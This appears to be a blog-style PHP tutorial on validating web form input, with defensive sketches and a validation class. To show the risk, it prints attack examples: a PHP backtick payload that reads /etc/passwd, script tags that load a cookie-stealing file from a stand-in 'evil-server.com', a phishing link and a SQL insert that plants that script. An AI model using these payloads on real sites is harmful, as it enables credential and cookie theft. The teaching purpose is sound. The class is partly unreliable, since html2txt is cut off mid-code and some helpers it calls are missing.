Background
Having worked with web-based technologies for more than ten years, I have seen quite a few attacks against web applications come into play: SQL injection, cross-site scripting, session hijacking and so on.
I was contracted by Iomega Corporation back in 2000 to assist with white-box and black-box testing of a new shopping cart application for their primary website: load balancing, basic functionality, advanced functionality and so on.
I was able to complete my basic assessment fairly quickly, as most of the basic and advanced functionality required nothing more than testing things like adding items to a cart, browsing for more items and so on.
Once I was finished with my test cases I began to try other things: base directory traversals, embedding cookie-stealing code, and even hijacking authenticated session tokens by emulating the server's session ID strings. At the time these attacks all returned positive results, indicating a complete lack of input validation on web forms as well as of validation of registered users.
To rely on an untrusted web application that processes credit card transactions is, to say the least, very scary.
Validation of input data
One thing I learned very early on is never to trust an end user. That is not to say all end users have malicious intent, but validating every input vector on a web-based form will account for those who do.
These days, having an automated bot crawl your website to dynamically test its input validation is more prevalent than ever. Back in 2000, when I was load testing the server, creating a simple script to parse the input fields and attempt blind SQL injection attacks was very easy for anyone with a little bit of time and coding ability, and it still is. I do believe the kiddies these days call this sort of thing 'fuzzing': testing a site for strange behaviours that may lead to further attacks on the targeted site.
As I said, validating your input is very important and a great place to start your research if you are new to web application development.
Let's say you have a simple contact form through which users can contact you via email. It is a pretty simple HTML form, and one like it is found on just about every website on the internet.
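The same idea can be turned around and used defensively. The following is only a rough sketch of a tiny fuzzing harness that throws a handful of hostile strings at a validator and reports which ones slip through. The names isPlainName and fuzzValidator and the payload list are made up for this illustration; a real fuzzer would use a far larger list and target live form fields.

```php
<?php
// Hypothetical validator under test: accepts only 1-35 ASCII letters.
function isPlainName(string $input): bool
{
    return preg_match('/^[a-z]{1,35}$/iD', $input) === 1;
}

// Feed every payload to the validator and collect the ones it wrongly accepts.
function fuzzValidator(callable $validator, array $payloads): array
{
    $accepted = [];
    foreach ($payloads as $payload) {
        if ($validator($payload)) {
            $accepted[] = $payload;
        }
    }
    return $accepted;
}

// A few illustrative hostile strings; a real list would be much longer.
$payloads = [
    "' OR '1'='1",
    "<script>alert(1)</script>",
    "../../etc/passwd",
    "Robert'); DROP TABLE feedback;--",
];

$leaks = fuzzValidator('isPlainName', $payloads);
echo count($leaks) . " hostile payload(s) accepted\n";
```

If the validator is doing its job, the list of accepted payloads stays empty; anything that shows up in it is a weak spot worth a closer look.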
<form action="contact.php" method="post" class="contact-form">
<fieldset>
<legend>Contact form</legend>
<div>
<input type="text" name="name" />
</div>
<div>
<input type="text" name="email" />
</div>
<div>
<textarea name="comments"></textarea>
</div>
<div>
<input type="submit" name="send" value="Contact" />
</div>
</fieldset>
</form>
This is a very simple and basic form for collecting feedback from a web page. The action attribute of the form sends the data to the file 'contact.php'. This file could do a variety of things: it could accept the user's input and immediately send an email to the administrator of the webpage, it could place the information in a database, or it could do both.
Let me show you an example of using this form to place the information within a MySQL database table. First I will show you the table's structure:
CREATE TABLE `feedback` (
`id` int(255) NOT NULL auto_increment,
`date` varchar(25) NOT NULL default '',
`ip` varchar(80) NOT NULL default '',
`port` int(255) NOT NULL default '0',
`name` varchar(45) NOT NULL default '',
`email` varchar(60) NOT NULL default '',
`comment` longtext NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `ip` (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
Using this type of database structure gives you easy access to any comments left using the form described above. Emails may be lost, but by using a data store you can account for every comment left for your site's administrators.
Now let's say that 'contact.php', the file that handles the user input, does not validate that input before displaying what the user submitted, and also attempts to store it in the database.
Our user decides to embed some code similar to the following:
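For comparison, here is a rough sketch of the kind of check 'contact.php' could run on the three form fields before mailing or storing anything. The function name validateContactForm, the allowed characters for the name and the 2000 character limit on comments are assumptions made for this example; the 45 and 60 character limits simply mirror the name and email columns of the table above.

```php
<?php
// Returns the names of the fields that failed; an empty array means all passed.
function validateContactForm(array $post): array
{
    // Treat missing or non-string values (e.g. name[]=x) as empty strings.
    $field = function (string $key) use ($post): string {
        return is_string($post[$key] ?? null) ? trim($post[$key]) : '';
    };

    $errors = [];

    // Name: letters, spaces, apostrophes and hyphens, at most 45 characters.
    if (!preg_match('/^[a-z][a-z \'-]{0,44}$/iD', $field('name'))) {
        $errors[] = 'name';
    }

    // Email: PHP's built-in syntax check plus the column length.
    $email = $field('email');
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false || strlen($email) > 60) {
        $errors[] = 'email';
    }

    // Comments: required, with an arbitrary upper bound for this sketch.
    $comments = $field('comments');
    if ($comments === '' || strlen($comments) > 2000) {
        $errors[] = 'comments';
    }

    return $errors;
}

$errors = validateContactForm($_POST);
echo $errors ? 'Rejected: ' . implode(', ', $errors) . "\n" : "Input accepted\n";
```

Only when the returned list is empty would the script go on to send the email or write to the database.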
<?PHP `cat /etc/passwd`; ?>
Oops, we now have a list of user names on the server, which we can feed to widely available tools to guess or brute-force user name and password combinations, leading to further attacks such as a kernel module that logs keystrokes and emails the results to our anonymous email account.
Now let's say the user simply wants to embed a JavaScript file hosted on a remote server, which can be used to sniff the authentication credentials of any other user visiting the contact form.
<?PHP
echo "<script src=\"http://www.evil-server.com/steal-cookies.js\" /></script>";
?>
Or something even more nefarious like sending mass emails to people with a URL like the following.
<a href="http://www.our-server.com/contact.php?<script src=\"http://www.evil-server.com/steal-cookies.js\" /></script>">Click our link for great coupons!</a>
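Both script injections above depend on the page echoing submitted text back to the browser as live HTML. As a minimal sketch of the usual counter-measure, the snippet below escapes a value with PHP's htmlspecialchars() before printing it. The helper name e is just a shorthand invented for this example.

```php
<?php
// Escape a value so it is shown as text instead of being parsed as HTML.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// The kind of comment an attacker might submit through the form.
$comment = '<script src="http://www.evil-server.com/steal-cookies.js"></script>';

// The browser now displays the tag as harmless text; no script is loaded.
echo '<p>' . e($comment) . '</p>' . "\n";
```

Escaping on output complements validation on input: even if something hostile does reach the database, it is rendered inert when displayed.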
Because the file processing our contact form does not validate any of the global $_GET or $_POST variables, it welcomes all sorts of possible attacks. One of the more serious is something like the following, in which we embed a reference to the JavaScript file on our remote server in the database, to be processed by any user visiting the website.
--;UNION INSERT INTO `feedback` (`comment`) VALUES ('<a href="http://www.our-server.com/contact.php?<script src=\"http://www.evil-server.com/steal-cookies.js\" /></script>">Click our link for great coupons!</a>');
These are some very simple examples of how would-be attackers can find weak spots in your web forms. If you are developing any type of web-facing form, it is in your best interest to validate your input.
That being said, here is a class to handle all sorts of input validation: strings, alphanumeric string combinations, integers, phone numbers (US), IP addresses, and even SQL and XSS validation.
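Alongside validation, the SQL side of these attacks is commonly blunted by never pasting user text into the query string at all. The following is a sketch only, using PDO prepared statements. The function name saveFeedback is invented for this example, and the demo runs against an in-memory SQLite table so that it is self-contained; with MySQL it is mainly the DSN handed to PDO that would differ.

```php
<?php
// Store one feedback row using bound parameters, so user text is sent to the
// database as data and is never spliced into the SQL statement itself.
function saveFeedback(PDO $pdo, string $name, string $email, string $comment): void
{
    $stmt = $pdo->prepare(
        'INSERT INTO feedback (name, email, comment) VALUES (:name, :email, :comment)'
    );
    $stmt->execute([':name' => $name, ':email' => $email, ':comment' => $comment]);
}

// Demo setup: an in-memory SQLite table (an assumption for this example).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE feedback (id INTEGER PRIMARY KEY, name TEXT, email TEXT, comment TEXT)');

// A hostile comment is stored verbatim as text; it is not executed as SQL.
saveFeedback($pdo, 'Mallory', 'm@example.com', "'); DROP TABLE feedback; --");
echo $pdo->query('SELECT COUNT(*) FROM feedback')->fetchColumn() . " row(s) stored\n";
```

The stored comment is still untrusted text, so it should be escaped again whenever it is displayed.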
Data validation class
class validation
{
var $data;
var $string;
var $integer;
var $alphachar;
var $money;
var $phone;
var $zipcode;
var $ip_v4;
var $ip_v6;
var $mac_address;
var $domain;
var $hostname;
var $paragraph;
var $password;
var $uri;
var $db;
var $sql;
var $xss;
// Every validator below returns 0 for valid (or empty) input and -1 otherwise.
// eregi() was removed in PHP 7, so preg_match() is used instead: the i flag
// ignores case and the D flag stops $ from matching before a trailing newline.
public function ValidateString( $string )
{
if( ( preg_match( '/^[a-z]{1,35}$/iD', $string ) ) || ( empty( $string ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateInteger( $integer )
{
if( ( preg_match( '/^[0-9]{1,20}$/D', $integer ) ) || ( empty( $integer ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateAlphaChar( $alphachar )
{
if( ( preg_match( '/^[0-9a-z_]{1,45}$/iD', $alphachar ) ) || ( empty( $alphachar ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateMoney( $money )
{
if( ( preg_match( '/^[0-9]{1,4}\.[0-9]{2}$/D', $money ) ) || ( empty( $money ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateDecimal( $decimal )
{
if( ( is_numeric( $decimal ) ) || ( empty( $decimal ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidatePhone( $phone )
{
if( ( preg_match( '/^[0-9]{3}-[0-9]{3}-[0-9]{4}$/D', $phone ) ) || ( empty( $phone ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateZip( $zipcode )
{
if( ( preg_match( '/^[0-9]{5}$/D', $zipcode ) ) || ( empty( $zipcode ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateIPv4( $ip_v4 = NULL )
{
$ip_v4 = rtrim( (string) $ip_v4 );
$data = -1;
// four dot-separated groups of one to three digits
if( preg_match( '/^[0-9]{1,3}(\.[0-9]{1,3}){3}$/D', $ip_v4 ) ) {
$data = 0;
// every octet must fall in the range 0-255
foreach( explode( '.', $ip_v4 ) as $octet ) {
if( (int) $octet > 255 ) {
$data = -1;
}
}
}
return $data;
}
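public function ValidateIPv6( $ip_v6 )
{
// filter_var() checks the IPv6 syntax; empty input is accepted, as in the other validators
if( ( empty( $ip_v6 ) ) || ( filter_var( $ip_v6, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6 ) !== false ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}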
public function ValidateEmail( $email )
{
if( ( preg_match( '/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,5})$/iD', $email ) ) || ( empty( $email ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateMACFormats( $mac_address = NULL )
{
$mac_address = rtrim( (string) $mac_address );
// Returns the address in aa:bb:cc:dd:ee:ff form, or -1 if it is not a MAC address.
// Accepted layouts: colon-separated pairs, pairs separated by '.', '-' or '_'
// (the same separator throughout), or 12 bare hex digits.
if( preg_match( '/^[0-9a-f]{2}(:[0-9a-f]{2}){5}$/iD', $mac_address ) ) {
$data = $mac_address;
} elseif( preg_match( '/^[0-9a-f]{2}([._-])[0-9a-f]{2}(\1[0-9a-f]{2}){4}$/iD', $mac_address ) ) {
$data = $this->FixMACAddr( $mac_address );
} elseif( preg_match( '/^[0-9a-f]{12}$/iD', $mac_address ) ) {
$data = $this->FixMACAddr( $mac_address );
} else {
$data = -1;
}
return $data;
}
public function FixMACAddr( $mac_address = NULL )
{
$mac_address = (string) $mac_address;
// Normalise any accepted layout to colon-separated pairs; return -1 otherwise.
if( preg_match( '/^[0-9a-f]{2}(:[0-9a-f]{2}){5}$/iD', $mac_address ) ) {
$data = $mac_address;
} elseif( preg_match( '/^[0-9a-f]{12}$/iD', $mac_address ) ) {
// 12 bare hex digits: insert a colon after every pair
$data = implode( ':', str_split( $mac_address, 2 ) );
} elseif( preg_match( '/^[0-9a-f]{2}([._-])[0-9a-f]{2}(\1[0-9a-f]{2}){4}$/iD', $mac_address ) ) {
// '.', '-' or '_' used as the separator: swap it for a colon
$data = str_replace( array( '.', '-', '_' ), ':', $mac_address );
} else {
$data = -1;
}
return $data;
}
public function ValidateDomain( $domain )
{
// ValidateHostname() and ValidateHostnameNonRFC() are not shown in this listing
if( empty( $domain ) ) {
// empty input is accepted, as in the other validators
$data = 0;
} elseif( preg_match( '/^[a-z0-9.]+$/iD', $domain ) ) {
if( ( @checkdnsrr( $domain, "A" ) ) || ( $this->ValidateHostname( $domain ) !== -1 ) || ( $this->ValidateIPv4( $domain ) !== -1 ) || ( $this->ValidateHostnameNonRFC( $domain ) !== -1 ) ) {
$data = 0;
} else {
$data = -1;
}
} else {
$data = -1;
}
return $data;
}
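public function ValidateParagraph( $paragraph )
{
// anchored so that every character must come from the allowed set,
// not just one of them; note the set has no newline, quote or parenthesis
if( ( preg_match( '/^[ !#$%&\'*+\\\\.\/0-9=?A-Z^_`a-z{|}~<>,]+$/D', $paragraph ) ) || ( empty( $paragraph ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}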
public function ValidatePassword( $password )
{
// anchored so that the whole password must consist of allowed characters
if( ( preg_match( '/^[-!#$%&+.0-9=?A-Z_]+$/iD', $password ) ) || ( empty( $password ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateDate( $date )
{
// expects YYYY-MM-DD HH:MM:SS and nothing before or after it
if( ( preg_match( '/^[0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}:[0-9]{2}$/D', $date ) ) || ( empty( $date ) ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidatePasswordFields( $password_1, $password_2 )
{
// 0 = valid, -1 = the two fields differ, -2 = bad length or characters,
// -3 = the literal string of twelve asterisks was submitted
$data = 0;
if( $password_1 !== $password_2 ) {
$data = -1;
} else {
if( !preg_match( '/^[-!#$@%&\'*+\\\\.\/0-9=?A-Z^_`a-z{|}~<>]{5,25}$/D', $password_1 ) ) {
$data = -2;
}
if( $password_1 === "************" ) {
$data = -3;
}
}
return $data;
}
public function ValidateURI( $uri )
{
// scheme, host name, optional directories, optional page, optional query string
$prefix = 'https?://';
$domain = '([a-z0-9][-[:alnum:]]*[[:alnum:]])(\.[[:alpha:]][-[:alnum:]]*[[:alpha:]])+';
$dir = '(/[[:alpha:]][-[:alnum:]]*[[:alnum:]])*';
$page = '(/[[:alpha:]][-[:alnum:]]*\.[[:alpha:]]{3,5})?';
$getstring = '(\?([[:alnum:]][-_%[:alnum:]]*=[-_%[:alnum:]]+)(&([[:alnum:]][-_%[:alnum:]]*=[-_%[:alnum:]]+))*)?';
// '#' is the delimiter because the pattern itself contains slashes
$pattern = '#^' . $prefix . $domain . $dir . $page . $getstring . '$#iD';
if( preg_match( $pattern, $uri ) ) {
$data = 0;
} else {
$data = -1;
}
return $data;
}
public function ValidateSQL( $sql, $db )
{
// InputFilter is not defined in this listing and must be loaded separately
$filter = new InputFilter();
return $filter->safeSQL( $sql, $db );
}
public function ValidateXSS( $xss )
{
$filter = new InputFilter();
return $filter->process( $xss );
}
function html2txt( $document ) {
$search = array('@
A very simple way to use this class on every page of your web application is to run each global array through it and work only with the filtered copies, something like the following:
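// include the class and register a handle
require 'class.validate.php';
$val = new validation;
// copy validated globals to localized variables
// (array_map() needs a callable, so the method is passed as an object/method pair;
// $_SESSION is only populated after session_start() has been called)
$get = array_map(array($val, 'ValidateXSS'), $_GET);
$post = array_map(array($val, 'ValidateXSS'), $_POST);
$sess = array_map(array($val, 'ValidateXSS'), $_SESSION);
$serv = array_map(array($val, 'ValidateXSS'), $_SERVER);
$req = array_map(array($val, 'ValidateXSS'), $_REQUEST);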
// use the validated copy of our globals
foreach($get as $key => $value) {
echo $key . ' => ' . $value . '<br />';
}
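One thing to watch with array_map() is that request arrays can be nested (a field named tags[] arrives as an array), and a flat map would hand that inner array straight to the filter. The helper below is a small sketch of a recursive variant. The name mapRecursive is invented for this example, and strip_tags() is used purely as a stand-in filter so the snippet runs on its own; it is not a complete XSS defence.

```php
<?php
// Apply $filter to every scalar value in a possibly nested array,
// keeping the keys and the nesting intact.
function mapRecursive(callable $filter, array $input): array
{
    $out = [];
    foreach ($input as $key => $value) {
        $out[$key] = is_array($value)
            ? mapRecursive($filter, $value)
            : $filter((string) $value);
    }
    return $out;
}

// Example request data with one nested field.
$raw = ['q' => '<b>hi</b>', 'tags' => ['a', '<i>b</i>']];
$clean = mapRecursive('strip_tags', $raw);
print_r($clean);
```

Any callable can be passed in place of strip_tags, including an object and method name pair. Note that only the values are filtered here; the keys also come from the user and deserve the same suspicion before being echoed.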
I hope this helps those of you who are just starting out in web application development. Having never gone to school for programming, it took me a lot of research to pull these things together and build a somewhat more secure layer into my applications.